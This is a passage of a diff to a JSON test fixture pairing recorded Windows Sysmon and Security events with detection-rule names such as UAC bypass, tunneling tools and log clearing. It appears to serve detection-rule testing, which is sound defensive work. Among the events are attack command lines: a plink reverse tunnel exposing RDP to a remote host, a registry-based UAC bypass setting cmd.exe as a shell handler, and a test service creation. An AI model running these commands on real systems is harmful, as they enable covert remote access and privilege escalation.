10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358991,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.776409Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358992,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.780448Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.782","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:05.782"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358993,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.787947Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359028,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.398014Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359030,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401175Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359031,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401210Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359032,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401236Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359033,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401303Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359036,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.418961Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.579","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf","UtcTime":"2020-08-25 10:08:37.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359040,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.594123Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.595","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms","UtcTime":"2020-08-25 10:08:37.595"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359041,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.610172Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359044,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.677776Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359046,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.678592Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359047,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.678627Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\TransactionLog.exe.log","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359048,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.678671Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-0010C79CBC03","ProcessId":7312,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 09:10:28.869"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5696,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:10:28.893194Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-001092A6BC03","ProcessId":2576,"RuleName":"PrivEsc - UAC bypass UACME-53","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 09:10:29.025"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5698,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:10:29.060588Z"}},"Version":2}}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Control Panel","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=391FF1F690C0912C217B3CF625900D4F50128867,MD5=88EA810385F455C74306D71C4879C61C,SHA256=4774A931C9D97828323C9E829917D82C27A05DAB9FEA6A0CEF9EBBA59942231F,IMPHASH=7A8EC2645C24D85DE8216D63022623C0","Image":"C:\\Windows\\System32\\control.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"747F3D96-A105-5D46-0000-00103BEBBC03","ParentProcessId":4532,"ProcessGuid":"747F3D96-A106-5D46-0000-00107201BD03","ProcessId":1380,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 09:10:30.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5702,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:10:30.752830Z"}},"Version":5}}}}] \ No newline at end of file +[{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":227693,"Execution_attributes":{"ProcessID":820,"ThreadID":608},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:01:41.593830Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0xaf855","SubjectUserName":"admin01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"EventData":{"CommandLine":"","NewProcessId":"0xcfc","NewProcessName":"C:\\Users\\user01\\Desktop\\plink.exe","ProcessId":"0xe60","SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x2ed80","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106","TokenElevationType":"%%1936"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":4688,"EventRecordID":227714,"Execution_attributes":{"ProcessID":4,"ThreadID":56},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13312,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:03:28.318440Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"EventData":{"CommandLine":"plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test","Company":"Simon Tatham","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Command-line SSH, Telnet, and Rlogin client","FileVersion":"Release 0.70","Hashes":"SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4","Image":"C:\\Users\\IEUser\\Desktop\\plink.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-D6AB-5C67-0000-002056660200","LogonId":"0x26656","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D92A-5C67-0000-0010CB580900","ParentProcessId":3904,"ProcessGuid":"365ABB72-DFAD-5C67-0000-0010E0811500","ProcessId":2312,"Product":"PuTTY suite","RuleName":"","TerminalSessionId":1,"User":"PC01\\IEUser","UtcTime":"2019-02-16 10:02:21.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1940899,"Execution_attributes":{"ProcessID":1728,"ThreadID":412},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-02-16T10:02:21.934438Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 14:43:46.619","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\phvj2yfb\\phvj2yfb.dll","UtcTime":"2019-07-19 14:43:46.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3575,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:43:46.623217Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New Service Creation"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D738-5D31-0000-001046A02600","ParentProcessId":4216,"ProcessGuid":"747F3D96-D738-5D31-0000-001098A22600","ProcessId":1700,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:08.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3577,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.185344Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 